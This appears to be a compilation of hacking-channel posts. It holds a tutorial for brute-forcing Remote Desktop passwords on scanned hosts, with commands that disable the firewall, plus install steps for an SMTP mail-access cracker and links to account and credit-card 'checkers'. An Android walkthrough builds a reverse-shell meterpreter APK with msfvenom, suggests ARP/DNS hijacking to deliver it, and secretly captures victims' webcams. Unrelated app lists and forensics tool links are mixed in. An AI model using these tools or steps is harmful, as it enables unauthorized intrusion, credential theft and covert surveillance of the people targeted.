▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑3389 blasting tool DUBrute use tutorial (graphic)

DUBrute is a powerful remote desktop (3389) password cracking software. You can use the scanning function of this accessory to automatically scan the active IP address. After the scan is completed, set the user name and the password that needs to be guessed and you can start fully automatic work . As long as your password is set well, I believe there will be great gains.
3389 is a remote desktop port. In order to make it easier to manage the server and update the resources on the server, many people often open port 3389. Use the nastat -an command to check the opening of the port. For an account, if the account password is too weak, it is easy to be blasted. Generally, the default account is Administrator, rarely admin. For too simple passwords, you can find them in the 3389 password dictionary. Let’s explain how to blast the 3389 server. The whole process of a server.

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) First use IP seacher to search for an active IP segment, or search for active 3389IP segment on Baidu, followed by SYN scanning, preferably scanning under server2003 server or virtual machine, if you insist on XP To scan under the system, let XP support SYN scanning first, copy the tcpip supporting SYN patch to the C:\Windows\System32\Drives directory, and restart the SYN scan. For the newly installed server2003 system, first perform the following services Fuck.

Copy codecode show as below:

sc config LmHosts start= auto
sc config RpcLocator start= auto
sc config NtlmSsp start= auto
sc config lanmanserver start= auto
sc config SharedAccess start= disablednet start LmHosts 2>nul
net start RpcLocator 2>nul
net start NtlmSsp 2>nul
net start lanmanserver 2>nul
net stop SharedAccess >nul 2>nul//*Stop the firewall

2) Copy the IP segment under IP seach to ip.txt under SYN scanner and start scanning for a period of time. After scanning, the ips file is produced. The IP in the IPS file is the IP with port 3389 opened.

3) The following uses the DUbrute3.0 (multiple password blasting, a single password blasting below this version) tool,

4) Source means "source". Bad means "bad" Good means "good" Error means "wrong" Check means: "detection" Thread means "thread" Start means "start" Stop means "stop" Config means "configuration" Generation means "generate" About Means "About" Exit means "Exit"


5) Probably the important translation is finished. Import the 3389 IP that needs to be blasted below, and open Generation directly. After opening, you will find that there are three columns that need to be added. The first column is the IP that needs to be blasted. , We directly click File IP to import all the IPs under IPS, the second column of Login is the login account, we can directly select Add Login to add the user name, two are fine, just Administrator or Admin, of course you can also import Username dictionary, but this is slower. In the third column Password, select File pass to import our 3389 password dictionary. Finally click made to exit the interface.

6) Click Config to configure.


7) OK, start to click Start to blast, wait time, the number behind Good indicates how many servers we have successfully blasted, Bad indicates that the bad ones are in Check, we can find the Good document under DUbrute to open, and you can see the servers that blasted successfully IP and login account password.


The tutorial is very simple, the key is to understand the principle by yourself by Undercode

enjoy❤️👍🏻
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

methode for Automating Anti-Phishing Reconnaissance Using Sender Policy Framework

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑TOR VS VPN, VPN AND TOR, WHICH ONE IS BETTER :
#forBeginers

If your goal is to encrypt the transmitted data so that your Internet provider could not analyze it, then both Tor and your VPN, which you yourself set up , can come up with ! I would not recommend using any third-party VPNs, since their owner can see all the transmitted traffic + client IP (that is, your IP address). If you use a third-party VPN service, then you are guaranteed to get a spyware who, at a minimum, also knows your real IP address! If this is a paid VPN, then it is absolutely not suitable for anonymity, since the VPN service does not only know your IP and has access to all transmitted data, then it knows who you are by your payment details.

1) The self-configured OpenVPN allows you to encrypt the transmitted traffic and integrate your devices into a virtual private network. You can also hide your real IP address and bypass site blocking. But for anonymity, this option is not suitable, because for the operation of OpenVPN you need to rent a VPS, for which you have to pay. Although if you use cryptocurrency or other anonymous methods for payment, OpenVPN will help you to be anonymous.

2) Using a single proxy has the same disadvantages as a VPN: the eavesdropper + proxy service knows your real IP address. An additional drawback in the absence of encryption is that your ISP can still analyze your traffic and even block access to websites.

3) The situation with IP concealment improves if a proxy chain is used, because (depending on the settings), each next proxy knows the IP address of the previous node (always) and the IP address of 1 node before the previous one (sometimes). If we consider that traffic is not encrypted at any stage, and a certain part of public proxies is just honeypots (intended for the exploitation of users), then the proxy option is not the best way to ensure anonymity.

enjoy❤️👍🏻
#wikiresources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

fresh detailed proxies

https://pastebin.com/Xj1gB65a

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 SMTP / Mail access Cracker :
Scanner & check & send to email
You can use this tool to crack smtp
mail access
SMTP / Mail access Cracker

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1️⃣Installation Linux alt tag
1) cd Desktop

2) git clone https://github.com/aron-tn/SMTP-Mail.acess-Cracker-Checker

3) cd SMTP-Mail.acess-Cracker-Checker

4) python2 smtp.py

2️⃣Installation Android alt tag

1) Download Termux

2) git clone https://github.com/aron-tn/SMTP-Mail.acess-Cracker-Checker

3) cd SMTP-Mail.acess-Cracker-Checker

4) python2 smtp.py

3️⃣Installation Windows alt tag

1) Download cmder

2) cd Desktop

3) git clone https://github.com/aron-tn/SMTP-Mail.acess-Cracker-Checker

4) cd SMTP-Mail.acess-Cracker-Checker
smtp.py

enjoy❤️👍🏻
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Need more checkers ?

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

ALL GOOD CHECKERS
#reposted
🦑Spootify & more :

> https://checkz.net/tools/spotify-account-checker

> https://github.com/Xpykerz/Spotify-Checker

🦑NETFLIX CHECKER ON GITHUB

https://github.com/AbdeslemSmahi/NetflixChecker
Features:

Python 3.x
Simple readable code
Mass Accounts checker
Combolist support
HTTP Proxy Support

🦑2020 cc checkers :

> http://necteknoloji.com/bh7cmz/checker-cc.html

> https://www.freeformatter.com/credit-card-number-generator-validator.html

> https://www.creditcards.com/

> http://mde.com.vn/hnragku/eldersc0de-checker.html

\🦑BIGGEST COLLECTION OF CHECKERS


https://mega.nz/#F!ZrAlgYRB!FxAbl6lCbEKafkkNm4J-3g

🖇Steam Checker

https://mega.nz/#F!Ui4nxZaB!1cG90VM6QIJaNpImnyNUBg

🖇Gmail Checker

https://mega.nz/#F!R7pznRBb!Xicc7uBYhLrEZ7LQKqPR5w

🖇Ebay Checker

https://mega.nz/#F!FzgQ1ZKK!aq4wyqjpYkRvbZJzIyJwqg

🖇PSN Checker

https://mega.nz/#F!xzRhQDRZ!fCwrExaL_rbZoV9HZqbTJA

🖇Skype Checker

https://mega.nz/#F!RmJjDD7C!ETsOJjw0qe-e9StFbSdnfA

🖇Direct Tv Checker

https://mega.nz/#F!RyZVXJwb!oW0YfM_hkd4rv880_PC6lA

🖇Instagram Checker

https://mega.nz/#F!FnATESTZ!qux4N4fYy3v__aO1y6ZcXw

🖇Origin Checker

https://mega.nz/#F!Nm5HyT6b!BxNl7TGp0zMY5uFK66ADoA

🖇Uplay Checker

https://mega.nz/#F!EnJllRjB!zcQlw2c3FTeeYS8F3rnneg

🖇NFL Checker

https://mega.nz/#F!1igCSQLZ!XIWhHhAMdt8hMwzqGe0BFg

🖇NBA checker

https://mega.nz/#F!MiYkGQJI!iS1oNC5OILBgmXqxy1Wqxw

🖇Hulu Checker

https://mega.nz/#F!06IGSLJA!pE_gPS-zXPH9-sBHaenAWQ

🖇HBO Checker

https://mega.nz/#F!Vuol1RjJ!p3upMORnPj_yK0tzuM8Bew

🖇Spotify Checker

https://mega.nz/#F!MrIxzLRb!MrvGM93IoBZNrUqcyd13ZQ

🖇Minecraft Checker

https://mega.nz/#F!VnYExALD!Gq6s0wcWHBGasqVf7R4VvQ

🖇FaceBook Checker

https://mega.nz/#F!BqgVCK4Y!wNUr88nr6kXCKQ5C4IMB1Q

🖇Crunchyroll Checker

https://mega.nz/#F!piwjWZrb!9rOOXFXrSdIqC1EcDsDCjw

🖇Netflix Checker

https://mega.nz/#F!djxXyIAB!Nif0xPb6QZvGuXctLY6CIQ

U S E F O R L E A R N

E N J O Y ❤️👍🏻
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑ALL IN ONE Kali Linux - Complete Training Program from Scratch(Source youtube)


https://mega.nz/folder/qEthVCjS#AsSx6gs6eWYD2LXN4e6Hzg

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑ANDROID HACKING METHODE :
MSF is the abbreviation of Metasploit. Metasploit is an open source security vulnerability detection tool. It is very powerful. There are Windows and Linux versions. The tool integrates many vulnerabilities announced by Microsoft (0day).

The system I tested here is Backbox linux, which is a network penetration and information security assessment system. Many tools are installed inside. MSF comes with it. Of course there are others such as Kali linux, Back Track, etc.

Environment: Backbox linux+MSF

Target: an Android phone

Since it is hacking an Android phone, an Android Trojan horse must be configured first, then let’s take a look at the IP of the machine

🅁🅄🄽 :

Local IP: 192.168.XZA.XYX

1) Enter the command in the terminal: msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=5555 R> /root/apk.apk

The old version of MSF used msfpayload to generate Trojans. Now msfvenom is used instead in the new version, so some friends will prompt when they enter msfpayload in the terminal.

2) msfpayload cannot find the command, so just use msfvenom, where LHOST corresponds to the IP address of the machine. LPORT corresponds to the port you want to monitor and then generates the path of the Trojan.

3) In this way, we have generated an APK Android Trojan file in the /root/ path. As for the Trojan-free killing, let's leave it alone. Now we are starting the MSF tool

Enter the command: msfconsole

🦑Then enter:

4) use exploit/multi/handler to load the module

5) set payload android/meterpreter/reverse_tcp select Payload

6) show options view parameter settings

7) We see that there are two parameters in the payload to set LHOST and LPORT, which means the address and port. The default port is 4444. Now let’s change the settings.

🅁🅄🄽 :

1) set LHOST 192.168.1.6 The address here is set to the IP address of the Trojan we just generated

2) set LPORT 5555 The port here is set to the port that we just generated the Trojan to monitor

3) The exploit starts to execute the vulnerability and starts monitoring...

OK, all preparations are ready. . . What we have to do now is to get the Trojan horse file on the other’s mobile phone. There are many ways to use DNS arp hijacking to deceive. As long as the other party downloads the file with the mobile phone, it will download our Trojan file.

4) There are social workers and so on, here I will simply put the Trojan horse file on my own phone for testing

5) After the installation is complete, a MainActivity program icon will be generated on the desktop. This is the Trojan we just generated. When we click on this icon, the phone will have no response. Its solid wood horse has started to run.

We can see in our MSF that there is a session connecteD

6) In this way, the other party’s mobile phone is controlled by us. To view the mobile phone system information, enter the command sysinfo





webcam_list Check how many camera heads there are on the phone. The two displayed here indicate that there are two front and rear cameras.



webcam_snap hidden camera function

7) Follow the parameter -i to specify which camera to take pictures

You can see that we took photos of the front and rear cameras and saved them on the desktop

You can also enter the command webcam_stream to turn on the camera

enjoy❤️👍🏻
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑best apps for youtubers :

https://itunes.apple.com/app/youtube-creator-studio/id888530356

https://play.google.com/store/apps/details?id=com.octoly.app&utm_source=octomag&utm_medium=footer_medium_app&utm_campaign=bestappsforyoutube

https://itunes.apple.com/us/app/octoly/id1100218563?mt=8

https://www.apple.com/imovie/


enjoy❤️👍🏻
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Security hacking tool :
-termux/linux

F E A T U R E S :

Reconnaissance:

HTTP Header checks
HTTP enabled methods check (Cross Site Tracing)
Cookie checks (decodes base64 automatically)
Information Disclosure:

Robots.txt Analysis
.htaccess public access check
.svn/entries public access check
Microsoft IIS, internal IP disclosure check
Injection Attacks:

Error based SQL injection:

Cookie based
User-Agent based
CRLF injection:

CRLF tests on main URLs
Host header injection:

Modifying Host header
Adding X-Forwarded-Host additional header
Clickjacking:

X-FRAME-OPTIONS header check
Frame busting checks

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) git clone https://github.com/a0xnirudh/WebXploiter.git

2) cd WebXploiter

3) Just run python install.py from install directory. Rest is taken care of :)

4) A sample output against localhost:

python WebXploiter.py -u "http://localhost/challs/action.php" -a

5) usage: WebXploiter.py [-h] [-u U] [-a] [-A1] [-A3]

Do a basic Recon for Web challenges

optional arguments:
-h, --help show this help message and exit
-u U, -url U Target URL to Recon
-a, -all Try all possible attacks
-A1 Test for only Injection Attacks
-A3 Test for only XSS Attacks

enjoy❤️👍🏻
git topic
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 ultimate design patterns part 1 and 2 by code with mosh:

Part 1:
https://drive.google.com/drive/folders/16EqCxq1mECjYF97d4bV55mJFXL1TbBFT

Part2:
https://drive.google.com/drive/folders/1E77rbUqmiTS7ZMu87ykPkmaTXmb-Nj35

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑BEST ANDROID VIDEO EDITING APPS 2020

https://play.google.com/store/apps/details?id=com.wondershare.filmorago

https://play.google.com/store/apps/details?id=com.adobe.premiereclip

https://play.google.com/store/apps/details?id=com.xvideostudio.videoeditor

https://play.google.com/store/apps/details?id=com.cyberlink.powerdirector.DRA140225_01

https://play.google.com/store/apps/details?id=com.nexstreaming.app.kinemasterfree

https://play.google.com/store/apps/details?id=com.stupeflix.replay

https://play.google.com/store/apps/details?
id=com.quvideo.xiaoying

https://play.google.com/store/apps/details?id=com.avcrbt.funimate

https://play.google.com/store/apps/details?id=com.magisto

https://play.google.com/store/apps/details?id=com.alivestory.android.alive

https://play.google.com/store/apps/details?id=com.funcamerastudio.videomaker


enjoy❤️👍🏻
git topic
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑MULTI HACKING TOOLS 2020 TOPIC :


* [GRR Rapid Response](https://github.com/google/grr) - Incident response framework focused on remote live forensics. It consists of a python agent (client) that is installed on target systems, and a python server infrastructure that can manage and talk to the agent. Besides the included Python API client, [PowerGRR](https://github.com/swisscom/PowerGRR) provides an API client library in PowerShell working on Windows, Linux and macOS for GRR automation and scripting.


* [Kolide Fleet](https://kolide.com/fleet) - State of the art host monitoring platform tailored for security experts. Leveraging Facebook's battle-tested osquery project, Kolide delivers fast answers to big questions.


* [Limacharlie](https://github.com/refractionpoint/limacharlie) - Endpoint security platform composed of a collection of small projects all working together that gives you a cross-platform (Windows, OSX, Linux, Android and iOS) low-level environment for managing and pushing additional modules into memory to extend its functionality.


* [MozDef](https://github.com/mozilla/MozDef) - Automates the security incident handling process and
facilitate the real-time activities of incident handlers.


* [nightHawk](https://github.com/biggiesmallsAG/nightHawkResponse) - Application built for asynchronus forensic data presentation using ElasticSearch as the backend. It's designed to ingest Redline collections.


* [Open Computer Forensics Architecture](http://sourceforge.net/projects/ocfa/) - Another popular distributed open-source computer forensics framework. This framework was built on Linux platform and uses postgreSQL database for storing data.


* [osquery](https://osquery.io/) - Easily ask questions about your Linux and macOS infrastructure using a SQL-like query language; the provided *incident-response pack* helps you detect and respond to breaches.


* [Redline](https://www.fireeye.com/services/freeware/redline.html) - Provides host investigative capabilities to users to find signs of malicious activity through memory and file analysis, and the development of a threat assessment profile.


* [The Sleuth Kit & Autopsy](http://www.sleuthkit.org) - Unix and Windows based tool which helps in forensic analysis of computers. It comes with various tools which helps in digital forensics. These tools help in analyzing disk images, performing in-depth analysis of file systems, and various other things.


* [TheHive](https://thehive-project.org/) - Scalable 3-in-1 open source and free solution designed to make life easier for SOCs, CSIRTs, CERTs and any information security practitioner dealing with security incidents that need to be investigated and acted upon swiftly.


* [X-Ways Forensics](http://www.x-ways.net/forensics/) - Forensics tool for Disk cloning and imaging. It can be used to find deleted files and disk analysis.


* [Zentral](https://github.com/zentralopensource/zentral) - Combines osquery's powerful endpoint inventory features with a flexible notification and action framework. This enables one to identify and react to changes on OS X and Linux clients.


enjoy❤️👍🏻
git topic 2020

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑BEST FREE RDP (LIMITES TIME)

1) Amazon Web Services - EC2 (free for 12 months but 750hours/month limit) - free tier t2.micro (1core 1Gb ram) too slow to run CGB.
2) Microsoft Azure - Virtual Machines (free $200 for 1-month trial)
3) Google Cloud - Compute Engine (free $300 for 60 days trial)
4) HP Helion - Cloud Compute (free $300 for 90 days trial)

Mid-tier:
1) Rackspace - https://developer.rackspace.com/ (free $600 for 12 months!)
2) DimensionData Public Cloud - https://cloud.dimens...n/limitedoffer/ (free $100)
3) RunAbove - Intel Steadfast instances https://www.runabove.com (free 1-week trial)

Others:
1) Vultr - https://www.vultr.com/ (free $50 for 2 months trial)
2) https://www.profitbricks.com/trial (free for 14 days) - no credit card needed but you need a business email and reason for using their VPS
3) http://cloudsigma.com/ (free for 7 days) - no credit card needed!
4) Digital Ocean - www.digitalocean.com - free $10 credit with promo code: DROPLET10 or DO10 - No Windows provided but you can install it, lots of tutorials on how to do so out there
5) http://ezywatch.com/freevps/ (free for 1 month) - no credit card needed!
6) Legionhoster - VPS http://legionhoster.com (1 week trial available on request from helpdesk)
7) http://www.yellowcircle.net/ - no credit card needed! No network access was given!
8) https://www.ctl.io/free-trial/ (free $2500 or 1 month - whichever comes first)
9) https://www.ihor.ru/ (free for 3 days) - no credit card needed!
10) http://www.neuprime.com/l_vds3.php (free for 10 days trial) - phone verification required.



enjoy❤️👍🏻
FROM RANDOM FORUM
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Quickly check for valid credentials across a network over SMB. Credentials can be:

Combination of user / plain-text password.
Combination of user / NTLM hash.
Combination of user / NTLM logon session token.

M O R E F E AT U R E S :

—Spawn an interactive command prompt.

—Navigate through the remote SMB shares: list, upload, download files, create, remove files, etc.

—Deploy and undeploy their own services, for instance, a backdoor listening on a TCP port for incoming connections.

—List users details, domains and password policy.

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) git clone https://github.com/nccgroup/keimpx.git

2) pip install -r requirements.txt

3) keimpx can then be executed by running on Linux systems:

./keimpx.py options

4) Or if this doesn't work:

python keimpx.py options
python3 keimpx.py options

5) On Windows systems, you may need to specify the full path to your Python 3.8 binary, for example:

C:\Python37\bin\python.exe keimpx.py options

enjoy❤️👍🏻
✅git 2020
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁